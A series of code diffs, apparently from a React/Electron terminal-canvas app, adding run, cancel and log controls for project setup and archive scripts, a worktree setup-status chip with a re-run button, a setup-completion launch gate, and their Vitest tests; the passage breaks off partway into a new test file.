+      /* A cancel that cannot be delivered leaves the run where it was; the event stream still owns
+         the truth about whether it ended. */
+    } finally {
+      setBusy('')
+      setStartedKey(null)
+    }
+  }
+
+  return (
+    <div className="space-y-2">
+      <div className="flex flex-wrap items-center gap-2">
+        {(['setup', 'archive'] as ProjectSetupKind[]).map((kind) => (
+          <Button
+            key={kind}
+            disabled={!canRun || !hasScript[kind] || active}
+            onClick={() => void start(kind)}
+          >
+            {RUN_LABEL[kind]}
+          </Button>
+        ))}
+        {liveKey ? (
+          <Button variant="ghost" disabled={busy === 'cancel'} onClick={() => void stop(liveKey)}>
+            Cancel
+          </Button>
+        ) : null}
+        {run && run.state !== 'running' ? (
+          <span className="text-[12px] text-muted">{exitNote(run.state, run.exitCode)}</span>
+        ) : null}
+      </div>
+      {!canRun ? (
+        <p className="text-[12px] leading-relaxed text-muted">
+          This project has nowhere to run a script — set a folder or a server connection first.
+        </p>
+      ) : null}
+      {notice ? (
+        <p role="status" className="text-[12px] leading-relaxed text-[color:var(--warn)]">
+          {notice}
+        </p>
+      ) : null}
+      {run ? (
+        <pre
+          role="log"
+          aria-label="Setup script output"
+          className="max-h-48 overflow-auto whitespace-pre-wrap break-words rounded-md border border-border bg-bg px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text"
+        >
+          {run.tail}
+        </pre>
+      ) : null}
+    </div>
+  )
+}
+
 function FamilySection({
   projectId,
   family,
@@ -372,6 +516,7 @@ function FamilySection({
   conflict,
   ready,
   sharedEditable,
+  canRun,
   saveShared,
   saveLocal,
   reload
@@ -391,6 +536,12 @@ function FamilySection({
   ready: boolean
   /** False when this project has no file to share (see `ProjectFamilyEditors`). */
   sharedEditable: boolean
+  /** False when the project has nowhere to run a script. Deliberately NOT `sharedEditable`, even
+   *  though today both come out of `project.cwd || project.ssh`: one is about where a FILE can be
+   *  written, the other about where a PROCESS can be spawned, and the run buttons live outside the
+   *  shared-editing gate entirely (a machine-local script on a folderless project still cannot
+   *  run). */
+  canRun: boolean
   saveShared: (doc: ProjectSettingsDoc) => Promise<boolean>
   saveLocal: (
     update: (current: ProjectLocalSettings | undefined) => ProjectLocalSettings | undefined
@@ -550,6 +701,19 @@ function FamilySection({
   return (
     <div className="space-y-3 border-t border-border pt-4">
       <h3 className="text-[13px] font-semibold text-text">{config.title}</h3>
+      {family === 'setup' ? (
+        <SetupRunControls
+          projectId={projectId}
+          canRun={canRun}
+          // EFFECTIVE values (local-over-shared), not the shared row's text: a machine-local
+          // script is a real script, and a family whose shared half is ignored on this machine
+          // has none even when the file sets one.
+          hasScript={{
+            setup: resolvedFamily.setupScript !== undefined,
+            archive: resolvedFamily.archiveScript !== undefined
+          }}
+        />
+      ) : null}
       {saveFailed ? (
         <p role="status" className="text-[12px] leading-relaxed text-[color:var(--warn)]">
           {SAVE_FAILED_NOTE[saveFailed]}
@@ -585,6 +749,7 @@ export function ProjectFamilyEditors({
   resolved,
   conflict,
   sharedEditable,
+  canRun,
   saveShared,
   saveLocal,
   reload
@@ -603,6 +768,9 @@ export function ProjectFamilyEditors({
    * not in the project folder, so `updateLocal` genuinely succeeds for a folderless project.
    */
   sharedEditable: boolean
+  /** See `FamilySection`'s `canRun`: where a PROCESS may be spawned, which is a different question
+   *  from where the shared file may be written. */
+  canRun: boolean
   saveShared: (doc: ProjectSettingsDoc) => Promise<boolean>
   saveLocal: (
     update: (current: ProjectLocalSettings | undefined) => ProjectLocalSettings | undefined
@@ -635,6 +803,7 @@ export function ProjectFamilyEditors({
           conflict={conflict}
           ready={ready}
           sharedEditable={sharedEditable}
+          canRun={canRun}
           saveShared={saveShared}
           saveLocal={saveLocal}
           reload={reload}

--- a/src/renderer/components/settings/sections/ProjectSettingsSection.test.tsx
+++ b/src/renderer/components/settings/sections/ProjectSettingsSection.test.tsx
@@ -10,6 +10,8 @@ import { registerWorkspaceDirty } from '../../../state/workspaceDirty'
 import { SettingsSearchContext } from '../context'
 import { ProjectSettingsSection } from './ProjectSettingsSection'
 import { mergeSharedDoc, useProjectSettings, type ProjectSettingsHook } from '../useProjectSettings'
+import type { ProjectSetupEvent } from '@shared/project-settings'
+import { useProjectSetup } from '../../../state/projectSetup'
 
 ;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
 
@@ -738,5 +740,175 @@ describe('mergeSharedDoc', () => {
     expect(mergeSharedDoc(current, { terminal: { shell: undefined } })).toEqual({
       setup: { waitForSetup: true }
     })
+  })
+})
+
+/**
+ * The setup family's RUN controls (Task 4). These buttons are the manual half of the trust gate:
+ * the service still decides whether the script may run (and raises the consent dialog), so what is
+ * pinned here is the renderer's side — the right call, the right ORDER (subscribe before run, or
+ * the first chunks are lost), an honest disabled state, and the live output.
+ */
+describe('ProjectSettingsSection — setup run controls', () => {
+  let root: Root
+  let host: HTMLElement
+  let runSetup: ReturnType<typeof vi.fn>
+  let cancel: ReturnType<typeof vi.fn>
+  let onEvent: ReturnType<typeof vi.fn>
+  let emit: (ev: ProjectSetupEvent) => void
+  let off: ReturnType<typeof vi.fn>
+
+  const snapshotWith = (setup: Record<string, unknown>): ProjectSettingsSnapshot => ({
+    shared: { version: 1, rev: 1, savedAt: '2026-08-19T00:00:00.000Z', setup },
+    local: undefined
+  })
+
+  const mountPanel = async (
+    snapshot: ProjectSettingsSnapshot,
+    p: Project = project()
+  ): Promise<void> => {
+    ;(window as unknown as { nodeTerminal: any }).nodeTerminal.projectSettings.read = vi.fn(
+      async () => snapshot
+    )
+    useProjects.setState({ projects: [p], activeProjectId: p.id })
+    root = createRoot(host)
+    await act(async () => {
+      root.render(
+        <SettingsSearchContext.Provider value="">
+          <ProjectSettingsSection projectId={p.id} isActive />
+        </SettingsSearchContext.Provider>
+      )
+    })
+  }
+
+  const button = (label: string): HTMLButtonElement => {
+    const el = [...host.querySelectorAll('button')].find((b) => b.textContent === label)
+    expect(el, `button "${label}"`).toBeTruthy()
+    return el as HTMLButtonElement
+  }
+
+  const hasButton = (label: string): boolean =>
+    [...host.querySelectorAll('button')].some((b) => b.textContent === label)
+
+  const log = (): HTMLElement | null => host.querySelector('[role="log"]')
+
+  beforeEach(() => {
+    host = document.createElement('div')
+    document.body.appendChild(host)
+    useProjectSetup.setState({ byProject: {}, byGroup: {} })
+    runSetup = vi.fn(async () => ({ status: 'started', runKey: 'run-1', waitForSetup: false }))
+    cancel = vi.fn(async () => true)
+    off = vi.fn()
+    onEvent = vi.fn((_projectId: string, cb: (ev: ProjectSetupEvent) => void) => {
+      emit = cb
+      return off
+    })
+    ;(window as unknown as { nodeTerminal: any }).nodeTerminal = {
+      projectSettings: { read: vi.fn(async () => EMPTY_SNAPSHOT), writeShared: vi.fn(async () => true), updateLocal: vi.fn(async () => true) },
+      projectSetup: { run: runSetup, cancel, onEvent, consent: vi.fn(), onConsentRequest: vi.fn(), onConsentDismiss: vi.fn() },
+      workspace: { save: vi.fn() }
+    }
+  })
+
+  afterEach(() => {
+    act(() => root.unmount())
+    host.remove()
+    useProjects.setState({ projects: [], activeProjectId: '' })
+    useProjectSetup.setState({ byProject: {}, byGroup: {} })
+  })
+
+  it('runs the setup script for this project, SUBSCRIBING to the event channel first', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make bootstrap' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    expect(runSetup).toHaveBeenCalledWith('p1', 'setup', undefined)
+    expect(onEvent).toHaveBeenCalledWith('p1', expect.any(Function))
+    // T1: main can emit the first chunks before the `run` invoke resolves, so a subscription
+    // opened after the ack would miss the head of the output.
+    expect(onEvent.mock.invocationCallOrder[0]).toBeLessThan(runSetup.mock.invocationCallOrder[0])
+  })
+
+  it('runs the archive script from its own button', async () => {
+    await mountPanel(snapshotWith({ archiveScript: 'rm -rf node_modules' }))
+    await act(async () => {
+      button('Run archive').click()
+    })
+    expect(runSetup).toHaveBeenCalledWith('p1', 'archive', undefined)
+  })
+
+  it('disables the button whose script is not set', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    expect(button('Run setup').disabled).toBe(false)
+    expect(button('Run archive').disabled).toBe(true)
+  })
+
+  it('uses the EFFECTIVE value: a machine-local script enables the button with none shared', async () => {
+    await mountPanel({ shared: null, local: { setup: { setupScript: 'local-only.sh' } } })
+    expect(button('Run setup').disabled).toBe(false)
+  })
+
+  it('disables both for a project with nowhere to run — no folder and no server', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make', archiveScript: 'clean' }), project({ cwd: undefined }))
+    expect(button('Run setup').disabled).toBe(true)
+    expect(button('Run archive').disabled).toBe(true)
+  })
+
+  it('shows the live output in a log box and disables the buttons while the run is going', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make', archiveScript: 'clean' }))
+    expect(log()).toBeNull()
+    await act(async () => {
+      button('Run setup').click()
+    })
+    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'compiling…\n' }))
+    expect(log()!.textContent).toContain('compiling…')
+    expect(button('Run setup').disabled).toBe(true)
+    expect(button('Run archive').disabled).toBe(true)
+    expect(hasButton('Cancel')).toBe(true)
+  })
+
+  it('cancels the live run by its runKey', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'x' }))
+    await act(async () => {
+      button('Cancel').click()
+    })
+    expect(cancel).toHaveBeenCalledWith('run-1')
+  })
+
+  it('reports the exit code when the run ends, and re-enables the buttons', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'boom\n' }))
+    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 2, state: 'failed', exitCode: 2 }))
+    expect(host.textContent).toContain('2')
+    expect(host.textContent?.toLowerCase()).toContain('failed')
+    expect(button('Run setup').disabled).toBe(false)
+    expect(hasButton('Cancel')).toBe(false)
+  })
+
+  it('explains a REFUSED run instead of looking like nothing happened', async () => {
+    runSetup.mockResolvedValue({ status: 'skipped', reason: 'declined' })
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    expect(host.textContent?.toLowerCase()).toContain('skipped')
+    expect(button('Run setup').disabled).toBe(false)
+  })
+
+  it('drops the subscription when the pane goes away', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    act(() => root.unmount())
+    expect(off).toHaveBeenCalledTimes(1)
+    root = createRoot(host)
   })
 })

--- a/src/renderer/components/settings/sections/ProjectSettingsSection.test.tsx
+++ b/src/renderer/components/settings/sections/ProjectSettingsSection.test.tsx
@@ -795,8 +795,8 @@ describe('ProjectSettingsSection — setup run controls', () => {
   beforeEach(() => {
     host = document.createElement('div')
     document.body.appendChild(host)
-    useProjectSetup.setState({ byProject: {}, byGroup: {} })
-    runSetup = vi.fn(async () => ({ status: 'started', runKey: 'run-1', waitForSetup: false }))
+    useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {} })
+    runSetup = vi.fn(async () => ({ status: 'started', runKey: 'rk-setup', runId: 'run-a', waitForSetup: false }))
     cancel = vi.fn(async () => true)
     off = vi.fn()
     onEvent = vi.fn((_projectId: string, cb: (ev: ProjectSetupEvent) => void) => {
@@ -814,7 +814,7 @@ describe('ProjectSettingsSection — setup run controls', () => {
     act(() => root.unmount())
     host.remove()
     useProjects.setState({ projects: [], activeProjectId: '' })
-    useProjectSetup.setState({ byProject: {}, byGroup: {} })
+    useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {} })
   })
 
   it('runs the setup script for this project, SUBSCRIBING to the event channel first', async () => {
@@ -860,7 +860,7 @@ describe('ProjectSettingsSection — setup run controls', () => {
     await act(async () => {
       button('Run setup').click()
     })
-    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'compiling…\n' }))
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 1, state: 'running', chunk: 'compiling…\n' }))
     expect(log()!.textContent).toContain('compiling…')
     expect(button('Run setup').disabled).toBe(true)
     expect(button('Run archive').disabled).toBe(true)
@@ -872,11 +872,11 @@ describe('ProjectSettingsSection — setup run controls', () => {
     await act(async () => {
       button('Run setup').click()
     })
-    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'x' }))
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 1, state: 'running', chunk: 'x' }))
     await act(async () => {
       button('Cancel').click()
     })
-    expect(cancel).toHaveBeenCalledWith('run-1')
+    expect(cancel).toHaveBeenCalledWith('rk-setup')
   })
 
   it('reports the exit code when the run ends, and re-enables the buttons', async () => {
@@ -884,8 +884,8 @@ describe('ProjectSettingsSection — setup run controls', () => {
     await act(async () => {
       button('Run setup').click()
     })
-    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 1, state: 'running', chunk: 'boom\n' }))
-    act(() => emit({ runKey: 'run-1', kind: 'setup', seq: 2, state: 'failed', exitCode: 2 }))
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 1, state: 'running', chunk: 'boom\n' }))
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 2, state: 'failed', exitCode: 2 }))
     expect(host.textContent).toContain('2')
     expect(host.textContent?.toLowerCase()).toContain('failed')
     expect(button('Run setup').disabled).toBe(false)
@@ -900,6 +900,58 @@ describe('ProjectSettingsSection — setup run controls', () => {
     })
     expect(host.textContent?.toLowerCase()).toContain('skipped')
     expect(button('Run setup').disabled).toBe(false)
+  })
+
+  it('C1: a SECOND run of the same script (same runKey, new runId) resets the box and re-disables the buttons', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 1, state: 'running', chunk: 'first run\n' }))
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 2, state: 'failed', exitCode: 1 }))
+    expect(button('Run setup').disabled).toBe(false)
+    expect(host.textContent).toContain('Failed (exit 1)')
+
+    // Run it again. `runKey` is DETERMINISTIC (kind + location), so the second run re-uses it and
+    // its `seq` restarts at 1 — the exact shape that used to be swallowed as stale, leaving the
+    // failed badge standing over a live script.
+    runSetup.mockResolvedValue({ status: 'started', runKey: 'rk-setup', runId: 'run-b', waitForSetup: false })
+    await act(async () => {
+      button('Run setup').click()
+    })
+    // Between the ack and the first event the lane still holds run A: it must not be shown.
+    expect(button('Run setup').disabled).toBe(true)
+    expect(host.textContent).not.toContain('Failed (exit 1)')
+
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-b', kind: 'setup', seq: 1, state: 'running', chunk: 'second run\n' }))
+    expect(log()!.textContent).toContain('second run')
+    expect(log()!.textContent).not.toContain('first run')
+    expect(button('Run setup').disabled).toBe(true)
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-b', kind: 'setup', seq: 2, state: 'done', exitCode: 0 }))
+    expect(host.textContent).toContain('Finished (exit 0)')
+    expect(button('Run setup').disabled).toBe(false)
+  })
+
+  it('I3: an event stream for a runKey this panel never claimed does not surface here', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    // A worktree's run for the same project, on the same channel: it carries no lane
+    // discriminator, and only the ATTACHMENT (this panel claimed 'rk-setup') keeps it out.
+    act(() => emit({ runKey: 'rk-worktree', runId: 'run-w', kind: 'setup', seq: 1, state: 'running', chunk: 'someone else\n' }))
+    expect(log()).toBeNull()
+    act(() => emit({ runKey: 'rk-setup', runId: 'run-a', kind: 'setup', seq: 1, state: 'running', chunk: 'mine\n' }))
+    expect(log()!.textContent).toContain('mine')
+    expect(log()!.textContent).not.toContain('someone else')
+  })
+
+  it('attaches the ACKED runKey to this project’s lane', async () => {
+    await mountPanel(snapshotWith({ setupScript: 'make' }))
+    await act(async () => {
+      button('Run setup').click()
+    })
+    expect(useProjectSetup.getState().projectRunKey.p1).toBe('rk-setup')
   })
 
   it('drops the subscription when the pane goes away', async () => {

--- a/src/renderer/components/settings/sections/ProjectSettingsSection.tsx
+++ b/src/renderer/components/settings/sections/ProjectSettingsSection.tsx
@@ -342,6 +342,9 @@ function EditableProjectSection({
         // Only the shell knows WHERE this project lives; a folderless inline canvas tab has no
         // shared settings file and never can have one — see `sharedEditable`.
         sharedEditable={Boolean(project.cwd || project.ssh)}
+        // Same predicate today, deliberately a separate prop: this one gates SPAWNING a setup
+        // script, not writing the shared file — see `FamilySection`'s `canRun`.
+        canRun={Boolean(project.cwd || project.ssh)}
         saveShared={settings.saveShared}
         saveLocal={settings.saveLocal}
         reload={settings.reload}

--- a/src/renderer/lib/pendingLaunch.test.ts
+++ b/src/renderer/lib/pendingLaunch.test.ts
@@ -50,6 +50,59 @@ describe('launchesToFire', () => {
   })
 })
 
+describe('launchesToFire — awaitSetupGroup (a worktree whose setup script must land first)', () => {
+  const live = new Set(['a', 'c'])
+  const armedForSetup = (id: string, groupId: string, after: string[] = []): ArmedNode => ({
+    id,
+    data: { pendingLaunch: { after, command: `echo ${id}`, awaitSetupGroup: groupId } }
+  })
+
+  it('holds the launch while the group’s setup run is not done', () => {
+    expect(launchesToFire([armedForSetup('c', 'g1')], {}, live, () => false)).toEqual([])
+  })
+
+  it('fires once the group’s setup run is done', () => {
+    expect(launchesToFire([armedForSetup('c', 'g1')], {}, live, () => true)).toEqual([
+      { id: 'c', command: 'echo c' }
+    ])
+  })
+
+  it('with no setupDone probe at all, the gate is open — an absent probe never strands a node', () => {
+    // Reached after an app restart: the run store is empty, and a node armed before the restart
+    // would otherwise wait forever for a run nobody is going to report on again.
+    expect(launchesToFire([armedForSetup('c', 'g1')], {}, live)).toEqual([
+      { id: 'c', command: 'echo c' }
+    ])
+  })
+
+  it('asks the probe about THIS node’s group', () => {
+    const asked: string[] = []
+    launchesToFire([armedForSetup('c', 'g-seven')], {}, live, (g) => {
+      asked.push(g)
+      return true
+    })
+    expect(asked).toEqual(['g-seven'])
+  })
+
+  it('needs BOTH gates: setup done AND every `after` dep satisfied', () => {
+    const node = [armedForSetup('c', 'g1', ['a'])]
+    // setup done, dep still working
+    expect(launchesToFire(node, { a: { state: 'working' } }, live, () => true)).toEqual([])
+    // dep done, setup still running
+    expect(launchesToFire(node, { a: { state: 'done' } }, live, () => false)).toEqual([])
+    // both
+    expect(launchesToFire(node, { a: { state: 'done' } }, live, () => true)).toEqual([
+      { id: 'c', command: 'echo c' }
+    ])
+  })
+
+  it('leaves a node with no awaitSetupGroup alone even while some setup is running', () => {
+    expect(launchesToFire([armed('c', [])], {}, live, () => false)).toEqual([
+      { id: 'c', command: 'echo c' }
+    ])
+  })
+})
+
 describe('unmetDeps', () => {
   it('reports only the deps still outstanding', () => {
     const live = new Set(['a', 'b', 'c'])

--- a/src/renderer/lib/pendingLaunch.ts
+++ b/src/renderer/lib/pendingLaunch.ts
@@ -45,16 +45,29 @@ function depSatisfied(depId: string, status: StatusById, live: ReadonlySet<strin
  * Which armed nodes are ready to launch, given the live canvas and the current agent states.
  * `live` is passed in (rather than derived from `nodes`) because the caller already holds the
  * full node list while `nodes` here may be pre-filtered.
+ *
+ * `setupDone` is the SECOND gate, for a node opened into a worktree frame whose project runs a
+ * setup script with `waitForSetup`: the node's command must not race an `npm ci` that is still
+ * writing node_modules underneath it. It answers per group id, and the two gates are ANDed —
+ * a node can be waiting on both its upstream stations and its checkout being ready.
+ *
+ * An ABSENT probe (`setupDone` not passed) means the gate is open. That is the honest default,
+ * not laxness: the run store is rebuilt from live events, so after an app restart a node armed
+ * with `awaitSetupGroup` has no run to hear from ever again, and reading "nothing known" as
+ * "still running" would strand it forever — the same reasoning as a deleted dependency counting
+ * as satisfied. (The caller's probe applies the same rule to a group with no entry.)
  */
 export function launchesToFire(
   nodes: readonly ArmedNode[],
   status: StatusById,
-  live: ReadonlySet<string>
+  live: ReadonlySet<string>,
+  setupDone?: (groupId: string) => boolean
 ): LaunchToFire[] {
   const out: LaunchToFire[] = []
   for (const n of nodes) {
     const p = n.data.pendingLaunch
     if (!p || !p.command) continue
+    if (p.awaitSetupGroup && !(setupDone?.(p.awaitSetupGroup) ?? true)) continue
     if (p.after.every((d) => depSatisfied(d, status, live))) out.push({ id: n.id, command: p.command })
   }
   return out

--- a/src/renderer/nodes/GroupNode.tsx
+++ b/src/renderer/nodes/GroupNode.tsx
@@ -4,6 +4,7 @@ import { NODE_MIN_SIZES } from '../lib/nodeSizing'
 import { NODE_COLORS, ungroupNodes, type CanvasNode } from '../state/workspace'
 import { useProjects } from '../state/projects'
 import { useWorktrees, WORKTREE_STATUS_POLL_MS } from '../state/worktrees'
+import { useProjectSetup } from '../state/projectSetup'
 
 export type WorktreeAction = 'merge' | 'remove' | 'unbind'
 
@@ -37,6 +38,14 @@ export function GroupNode({ id, data, selected }: NodeProps<CanvasNode>) {
   // (WORKTREE_STATUS_THROTTLE_MS) and is epoch-guarded, so asking often is free.
   const status = useWorktrees((s) => (wt ? s.statusByPath[wt.path] : undefined))
   const stale = useWorktrees((s) => (wt ? s.staleGroupIds.includes(id) : false))
+  // The project setup/archive script Canvas launched for THIS checkout, resolved through the
+  // attachment its ack made (an event carries no lane — see the store's header). Selected as the
+  // entry itself, so a render happens only when this group's run changes, not on every chunk of
+  // every other project's script.
+  const setupRun = useProjectSetup((s) => {
+    const runKey = s.groupRunKey[id]
+    return runKey === undefined ? undefined : s.byRunKey[runKey]
+  })
 
   // On an SSH project the poll is OFF, not merely useless: `git status <path>` would be answered by
   // the LOCAL filesystem for a project whose checkout lives on the host (remote git routing is
@@ -209,6 +218,25 @@ export function GroupNode({ id, data, selected }: NodeProps<CanvasNode>) {
                     · {status.behind}↓
                   </em>
                 )}
+              </span>
+            )}
+            {setupRun && (
+              // What the project's script is doing to this checkout. Status only — the OUTPUT lives
+              // in the settings panel's run box (this is a frame header, not a log viewer), and the
+              // failed state is the one that has to be visible here: a node armed behind a failed
+              // setup is still holding its launch, and nothing else on the canvas says why.
+              <span
+                className={`group-node__setup group-node__setup--${setupRun.state}`}
+                title={
+                  `${setupRun.kind === 'archive' ? 'Archive' : 'Setup'} script: ${setupRun.state}` +
+                  (setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`) +
+                  (setupRun.state === 'failed'
+                    ? '\nNodes waiting on it keep holding their launch — re-run it from Project settings.'
+                    : '')
+                }
+              >
+                {setupRun.kind === 'archive' ? 'archive' : 'setup'}
+                {setupRun.state === 'running' ? ' …' : setupRun.state === 'done' ? ' ✓' : ' ✕'}
               </span>
             )}
             {!stale && (

--- a/src/renderer/nodes/GroupNode.tsx
+++ b/src/renderer/nodes/GroupNode.tsx
@@ -46,6 +46,12 @@ export function GroupNode({ id, data, selected }: NodeProps<CanvasNode>) {
     const runKey = s.groupRunKey[id]
     return runKey === undefined ? undefined : s.byRunKey[runKey]
   })
+  // A launch for this group is already on its way (requested, not yet acked — which includes the
+  // whole time a consent dialog is up). The re-run chip must not fire a second one: the service
+  // would answer `busy`, and the store's counter exists precisely because that ack must not be
+  // mistaken for "nothing is happening".
+  const setupPending = useProjectSetup((s) => (s.pendingByGroup[id] ?? 0) > 0)
+  const setupBusy = setupPending || setupRun?.state === 'running'
 
   // On an SSH project the poll is OFF, not merely useless: `git status <path>` would be answered by
   // the LOCAL filesystem for a project whose checkout lives on the host (remote git routing is
@@ -233,16 +239,19 @@ export function GroupNode({ id, data, selected }: NodeProps<CanvasNode>) {
               // group's lane, and a `done` from the new run releases them.
               (setupRun.kind === 'setup' && setupRun.state === 'failed' ? (
                 <button
-                  className="group-node__setup group-node__setup--failed nodrag"
+                  className={`group-node__setup group-node__setup--${setupBusy ? 'running' : 'failed'} nodrag`}
+                  disabled={setupBusy}
                   title={
-                    `Setup script failed${setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`}.` +
-                    '\nNodes opened into this worktree may still be holding their launch.' +
-                    '\nClick to run it again — a successful run releases them.' +
-                    '\n(Its output is in Project settings → Setup.)'
+                    setupBusy
+                      ? 'Setup script is starting…'
+                      : `Setup script failed${setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`}.` +
+                        '\nNodes opened into this worktree may still be holding their launch.' +
+                        '\nClick to run it again — a successful run releases them.' +
+                        '\n(Its output is in Project settings → Setup.)'
                   }
                   onClick={() => worktreeActionHandler?.(id, 'rerun-setup')}
                 >
-                  setup ✕ ↻
+                  {setupBusy ? 'setup …' : 'setup ✕ ↻'}
                 </button>
               ) : (
                 <span

--- a/src/renderer/nodes/GroupNode.tsx
+++ b/src/renderer/nodes/GroupNode.tsx
@@ -6,7 +6,7 @@ import { useProjects } from '../state/projects'
 import { useWorktrees, WORKTREE_STATUS_POLL_MS } from '../state/worktrees'
 import { useProjectSetup } from '../state/projectSetup'
 
-export type WorktreeAction = 'merge' | 'remove' | 'unbind'
+export type WorktreeAction = 'merge' | 'remove' | 'unbind' | 'rerun-setup'
 
 /**
  * Worktree-action handler bridge. React Flow instantiates custom nodes itself, so we can't
@@ -220,25 +220,42 @@ export function GroupNode({ id, data, selected }: NodeProps<CanvasNode>) {
                 )}
               </span>
             )}
-            {setupRun && (
+            {setupRun &&
               // What the project's script is doing to this checkout. Status only — the OUTPUT lives
               // in the settings panel's run box (this is a frame header, not a log viewer), and the
               // failed state is the one that has to be visible here: a node armed behind a failed
               // setup is still holding its launch, and nothing else on the canvas says why.
-              <span
-                className={`group-node__setup group-node__setup--${setupRun.state}`}
-                title={
-                  `${setupRun.kind === 'archive' ? 'Archive' : 'Setup'} script: ${setupRun.state}` +
-                  (setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`) +
-                  (setupRun.state === 'failed'
-                    ? '\nNodes waiting on it keep holding their launch — re-run it from Project settings.'
-                    : '')
-                }
-              >
-                {setupRun.kind === 'archive' ? 'archive' : 'setup'}
-                {setupRun.state === 'running' ? ' …' : setupRun.state === 'done' ? ' ✓' : ' ✕'}
-              </span>
-            )}
+              //
+              // A FAILED SETUP IS THEREFORE A BUTTON, not a label. It is the only re-run that can
+              // clear this: the settings panel's Run executes at the project ROOT and claims the
+              // PROJECT lane, so it can never re-attach a worktree group's run — clicking it would
+              // leave this chip failed and its nodes armed forever. Re-running here re-attaches the
+              // group's lane, and a `done` from the new run releases them.
+              (setupRun.kind === 'setup' && setupRun.state === 'failed' ? (
+                <button
+                  className="group-node__setup group-node__setup--failed nodrag"
+                  title={
+                    `Setup script failed${setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`}.` +
+                    '\nNodes opened into this worktree may still be holding their launch.' +
+                    '\nClick to run it again — a successful run releases them.' +
+                    '\n(Its output is in Project settings → Setup.)'
+                  }
+                  onClick={() => worktreeActionHandler?.(id, 'rerun-setup')}
+                >
+                  setup ✕ ↻
+                </button>
+              ) : (
+                <span
+                  className={`group-node__setup group-node__setup--${setupRun.state}`}
+                  title={
+                    `${setupRun.kind === 'archive' ? 'Archive' : 'Setup'} script: ${setupRun.state}` +
+                    (setupRun.exitCode === undefined ? '' : ` (exit ${setupRun.exitCode})`)
+                  }
+                >
+                  {setupRun.kind === 'archive' ? 'archive' : 'setup'}
+                  {setupRun.state === 'running' ? ' …' : setupRun.state === 'done' ? ' ✓' : ' ✕'}
+                </span>
+              ))}
             {!stale && (
               <button
                 className="group-node__wt-btn"

--- a/src/renderer/nodes/TerminalNode.tsx
+++ b/src/renderer/nodes/TerminalNode.tsx
@@ -1383,9 +1383,14 @@ export function TerminalNode({
   // it is armed, and by WHAT it is blocked — dep titles read straight off the live canvas, since
   // "waits for term-17" tells the user nothing.
   const pendingLaunch = data.pendingLaunch as PendingLaunch | undefined
-  const pendingWaitingOn = (pendingLaunch?.after ?? [])
-    .map((depId) => ((getNode(depId) as CanvasNode | undefined)?.data.title as string) || depId)
-    .join(', ')
+  const pendingWaitingOn = [
+    ...(pendingLaunch?.after ?? []).map(
+      (depId) => ((getNode(depId) as CanvasNode | undefined)?.data.title as string) || depId
+    ),
+    // The other thing a launch can be held on: this worktree's project setup script. Named, or the
+    // tooltip on a setup-only hold would read "Waiting for  to finish".
+    ...(pendingLaunch?.awaitSetupGroup ? ['the project setup script'] : [])
+  ].join(', ')
   // Use the chat panel only for a chat-capable agent with a known session; otherwise the
   // markdown-of-output view (computed in the capture effect below) is shown as a fallback.
   const useChat = mdMode && showChat && !!status?.sessionId

--- a/src/renderer/nodes/group-setup-chip.test.tsx
+++ b/src/renderer/nodes/group-setup-chip.test.tsx
@@ -1,0 +1,106 @@
+// @vitest-environment jsdom
+//
+// The worktree frame's setup chip. A FAILED setup is the one state that must be actionable from
+// here: the settings panel's Run executes at the project ROOT and claims the PROJECT lane, so it can
+// never re-attach this group's run — clicking it would leave the chip failed and the nodes it armed
+// waiting forever. So the chip itself is the re-run, and it must refuse to fire a second launch
+// while one is already in flight (the service would answer `busy`, and a `busy` ack knows nothing
+// about the run that is actually going).
+import { act } from 'react'
+import { createRoot } from 'react-dom/client'
+import { describe, expect, it, beforeEach, vi } from 'vitest'
+import type { ProjectSetupEvent } from '@shared/project-settings'
+import { useProjectSetup } from '../state/projectSetup'
+import { useWorktrees } from '../state/worktrees'
+
+// React Flow instantiates custom nodes itself; the chip needs none of that machinery.
+vi.mock('@xyflow/react', () => ({
+  NodeResizer: () => null,
